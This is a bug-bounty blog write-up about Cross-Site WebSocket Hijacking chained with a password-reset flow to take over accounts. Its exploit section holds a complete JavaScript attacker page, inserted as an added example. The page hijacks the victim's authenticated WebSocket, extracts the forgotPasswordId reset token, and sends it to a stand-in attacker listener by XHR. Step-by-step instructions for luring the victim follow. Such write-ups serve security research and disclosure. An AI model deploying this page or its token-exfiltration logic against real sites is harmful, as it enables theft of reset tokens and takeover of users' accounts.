Account Takeover Using Cross-Site WebSocket Hijacking (CSWH)

Sharan Panegav
Mar 9, 2019 · 3 min read

Hello,

While hunting on a private program, I found that the application used a WebSocket connection, so I checked the WebSocket URL and found it was vulnerable to CSWH (Cross-Site WebSocket Hijacking).

For more details about CSWH you can go through the blog below:

  1. https://www.christian-schneider.net/CrossSiteWebSocketHijacking.html

So let’s assume an application establishes a WebSocket connection to the URL wss://website.com. To verify whether the URL is vulnerable to CSWH, I followed the steps below.

  1. Open the web application in a browser and log in to it.
  2. After this, visit http://websocket.org/echo.html in a new tab, enter the WebSocket URL and click ‘Connect’.
  3. Once the connection is established you should be able to send frames to the server from this page. Capture the WebSocket frames from a valid session using Burp proxy and replay them here to see how the server responds. If the server responds the same way it did for the valid session, it is most likely vulnerable to Cross-Site WebSocket Hijacking: the echo page is a foreign origin, so the server is accepting the handshake on the strength of the session cookies the browser attached automatically, without checking the Origin header (or any per-session token in the URL). Note that the browser only attaches the victim’s cookies to such a cross-site handshake if they are not marked SameSite.

By following the above steps I determined the application was vulnerable to Cross-Site WebSocket Hijacking.

Once I established the WebSocket connection in the new tab, I received the WebSocket response below.

If you observe the above response, there is a parameter “forgotPasswordId” and its value is “null”.

Now I needed to determine the value of “_forgotPasswordId” to complete the attack, so I went to the forgot-password page and submitted a password reset request.

I checked the WebSocket connection once again and this time observed the response below, which contains the forgot-password token.

Exploit:

To turn this into an account takeover, CSWH has to be chained with the password reset request: the attacker triggers a reset for the victim, and the victim’s own browser, hijacked from an attacker page, reads the token off the WebSocket. So I prepared a payload (CSWH.html) that forwards the WebSocket response to the attacker’s site using XHR.
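The script below is an added example of what such an attacker page contains; it is not the author’s original CSWH.html, which is not reproduced here. It opens a WebSocket to the target (the browser attaches the victim’s cookies), watches incoming frames for a non-null forgotPasswordId, and forwards the frame to the attacker’s listener with XHR. The listener URL is hypothetical, the WebSocket path is unknown, and the frame format is assumed to be JSON (with a regex fallback), since the original response images are not available.

```javascript
// Added example, not the author's original CSWH.html. Runs inside the attacker-hosted
// page; the victim's browser attaches the target's session cookies to the handshake.
// TARGET_WS is the host named in the post (real path unknown); LISTENER is hypothetical.
const TARGET_WS = 'wss://website.com';
const LISTENER = 'https://attacker.example/collect';

// Pull forgotPasswordId out of one frame. Assumption: frames are JSON and the key
// may sit at any depth (both spellings seen in the post are accepted). Non-JSON text
// falls back to a regex. Returns null when the key is absent or its value is null,
// i.e. the reset has not been requested yet.
function extractForgotPasswordId(frameText) {
  let data;
  try {
    data = JSON.parse(frameText);
  } catch (_) {
    const m = /forgotPasswordId["']?\s*[:=]\s*["']?([A-Za-z0-9._-]+)/.exec(frameText);
    return m && m[1] !== 'null' ? m[1] : null;
  }
  const stack = [data];
  while (stack.length) {
    const node = stack.pop();
    if (node && typeof node === 'object') {
      for (const [k, v] of Object.entries(node)) {
        if (k === 'forgotPasswordId' || k === '_forgotPasswordId') {
          return v === null || v === undefined ? null : String(v);
        }
        stack.push(v);
      }
    }
  }
  return null;
}

// Put the token and the raw frame in the query string so they land in the
// listener's request log even though the cross-origin response is unreadable.
function exfilUrl(listener, token, frameText) {
  const u = new URL(listener);
  u.searchParams.set('token', token);
  u.searchParams.set('frame', frameText);
  return u.toString();
}

function runHijack() {
  const ws = new WebSocket(TARGET_WS); // cross-site, but the victim's cookies ride along
  ws.onopen = () => {
    // Some applications push state on connect; others need a client request first.
    // If yours does, replay here whatever the legitimate client sends (captured in Burp).
  };
  ws.onmessage = (ev) => {
    const frame = String(ev.data);
    const token = extractForgotPasswordId(frame);
    if (!token) return; // stays null until the reset has been requested for the victim
    const xhr = new XMLHttpRequest();
    xhr.open('GET', exfilUrl(LISTENER, token, frame));
    xhr.send(); // fire-and-forget; CORS only blocks reading the response, not sending
    ws.close();
  };
}

// Only start in a browser; the helpers above are usable on their own (e.g. under Node).
if (typeof window !== 'undefined' && typeof WebSocket !== 'undefined') {
  runHijack();
}
```

Keep the page open on the victim’s side while the reset is triggered: if the token is pushed only once, the frame must arrive while the hijacked socket is connected, which is why the reset request in the steps below comes first.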

Steps:

  1. Send a password reset link to the victim (using the Forgot Password page).
  2. Host the above CSWH.html and send its URL to the victim (similar to a CSRF attack).
  3. Once the victim clicks the URL, the WebSocket response arrives on your listener, as shown in the image below.

Response on the attacker’s webhook listener

Once we have the forgot-password token, we can reset the victim’s password.
